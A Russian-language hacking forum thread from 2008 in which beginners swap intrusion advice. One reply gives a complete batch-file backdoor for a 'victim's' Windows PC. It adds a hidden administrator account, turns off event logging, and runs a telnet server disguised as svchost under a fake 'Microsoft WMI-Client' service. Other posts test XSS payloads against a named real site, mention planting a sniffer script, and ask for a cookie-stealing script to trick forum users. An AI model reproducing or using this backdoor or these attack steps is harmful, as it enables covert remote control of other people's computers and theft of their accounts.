ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.05.2008, 23:46
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от Demetra
каталог статей,после индексной страницы ставлю <IMG%20SRC="javascript:alert();
site.ru/index.php<IMG%20SRC="javascript :alert(); так чтоли? ну конечно ничего работать не будет...ты никакому параметру не передаешь значение.
|
|
|
28.05.2008, 05:53
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Извените конешно тут у меня такой ламерский вопрос, что нужно сделать на компе жертвы что бы можно было удалённо выполнять команды на нём через telnet
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт (ну тоесть что бы через команду телнета войти на фтп моего сайта)
Последний раз редактировалось ZET36; 28.05.2008 в 07:39..
|
|
|
|
28.05.2008, 11:33
|
|
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291
Репутация:
17
|
|
все остальное вобще некатит,а это заглючило подумала может что то есть
|
|
|
|
28.05.2008, 12:51
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Demetra не нужно после ссылки ставить <img src=javasript:alert()> нужно проверять переменные, вот смотри есть ссылка
http://sm.aport.ru/scripts/template.dll?That=ads&Base=ads&Rt=2&Tn=57&r=%F1%EA %E0%F7%E0%F2%FC+mp3
пременная r отвечает за текст который ты исщещ в поисковике . и проверяеш её на фильтрацию (тоесть вставляеш туда свой скрипт)
http://sm.aport.ru/scripts/template.dll?That=ads&Base=ads&Rt=2&Tn=57&r="><scr ipt>alert(1)</script>
если сообщение выскакивает значит фильтрации нет и xss уязвимость есть и можно вставлять скрипт снифера, если нет то фильтрация есть , а вообще тебе рано xss изучать если ты незнаеш html и jajascript скачай учебники и учи , без знания этих языков ты не сможеш испльзовать и искать xss уязвимости ,
Последний раз редактировалось ZET36; 28.05.2008 в 12:55..
|
|
|
|
28.05.2008, 12:58
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
ZET36давно не сидел в хр(поэтому может немного отходить от истины). заходишь в службы: выполнить "gpedit.msc" там в службах включи службу сервера телнет.
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт
по поводу телнета не знаю, а вот через ssh можешь. Команда будет выглядеть ssh user@sait - в линуксе. если через питти - тогда ставишь 21 порт заместо 22
|
|
|
|
28.05.2008, 13:04
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
samarin спасибо
|
|
|
|
28.05.2008, 13:14
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
Всем здрасте, вопрос касательно MySQL инъекции. Имеем инъекцию вида:
http://site/polls/?kwd=1
Ответ получаем:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/wwwdocs/features/polls/pollofdayarchive.php on line 53
При пустом параметре kwd - ошибки нет.
Запрос вида http://site/polls/?kwd=OR 1=1 также выдает ошибку, пробовал вариации типа:
http://site/polls/?kwd=)+OR+1=1 и т.д. на любое изменение параметра kwd ругается, однако вставить свой запрос не выходит...
Также... При kwd=0 ошибки нет, а при kwd=1-1 ошибка есть.
Кто что может посоветовать?
P.S. С радостью приму помощь в icq: 59600O00
Последний раз редактировалось Dima-k17; 28.05.2008 в 13:18..
|
|
|
|
28.05.2008, 14:52
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 153
Провел на форуме:
1758769
Репутация:
341
|
|
прив всем....
вопрос такой: как зделать так чтобы в Internet Explorer.е не вылетала табличка сохранить пороль, а чтоб автоматом его сохраняла и не задавала глупых вопросов))))
|
|
|
|
28.05.2008, 15:13
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
Сообщение от ZET36
Извените конешно тут у меня такой ламерский вопрос, что нужно сделать на компе жертвы что бы можно было удалённо выполнять команды на нём через telnet
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт (ну тоесть что бы через команду телнета войти на фтп моего сайта)
---bat файл---
Код:
@echo off
net localgroup TelnetClients /add
net user admin pass /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client
После запуска этого батника к компу можно коннектится телнетом
|
|
|
|
28.05.2008, 16:06
|
|
Новичок
Регистрация: 19.05.2008
Сообщений: 20
Провел на форуме:
275542
Репутация:
0
|
|
Всем доброго время суток...У меня такой вопрос,знаю что не мало обсуждался,но именноо то что мне нужно я не нашел(может плохо искал,но не нашел)
Мне нужен пхп-скрипт для кражи "печенюшек" с того сайта/форума которого он перешел на эту страницу...Тоесть,я например даю ссылку пользователлю форума и говорю посмотри классные девки,он переходит на ссылку (где спрятан скрипт кражи кукисов) и все его куки сохраняются в отдельный файл...у меня когда то был такой,но как грицо СПЛЫЛ...не ставьте мне "-",я только новичёк,и вроде обратился по теме,или киньте хотя бы ссылку где можна это взять...заранее благодарен
Кто напишет в ПМ,буду оч сильно благодарен!
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
